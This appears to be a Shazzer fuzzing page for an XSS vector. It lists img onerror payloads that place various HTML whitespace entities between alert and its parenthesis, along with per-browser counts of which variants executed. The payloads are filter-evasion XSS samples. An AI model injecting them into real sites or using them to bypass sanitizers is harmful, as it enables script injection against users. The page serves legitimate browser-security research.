Entities allowed between function calls
This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are still a bit inconsistent because I currently wait for page load.
Created by: hackvertor
Created on: Saturday, June 29, 2024 at 1:55:26 PM
Updated on: Friday, December 6, 2024 at 9:56:55 PM
Vector type: XSS
Vector charset: UTF-8
Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">
Sample payloads
<img src=data: onerror="alert ('&ThinSpace;')">
<img src=data: onerror="alert ('&puncsp;')">
<img src=data: onerror="alert ('&MediumSpace;')">
<img src=data: onerror="alert ('&thinsp;')">
<img src=data: onerror="alert ('&hairsp;')">
<img src=data: onerror="alert ('&emsp;')">
<img src=data: onerror="alert ('&NonBreakingSpace;')">
<img src=data: onerror="alert
('&NewLine;')">
<img src=data: onerror="alert ('&emsp13;')">
<img src=data: onerror="alert ('&emsp14;')">
<img src=data: onerror="alert ('&ensp;')">
<img src=data: onerror="alert	('&Tab;')">
<img src=data: onerror="alert ('&nbsp;')">
<img src=data: onerror="alert ('&numsp;')">
<img src=data: onerror="alert ('&VeryThinSpace;')">
Fuzz results
Chrome 126.0.0.0 desktop macOS 10.15.7
Updated: Sat Jun 29 2024
Found 8 results
Firefox 127.0 desktop macOS 10.15
Updated: Sat Jun 29 2024
Found 4 results
Safari 17.4 desktop macOS 10.15.7
Updated: Sat Jun 29 2024
Found 2 results
Safari 17.5 mobile iOS 17.5.1
Updated: Sun Jun 30 2024
Found 6 results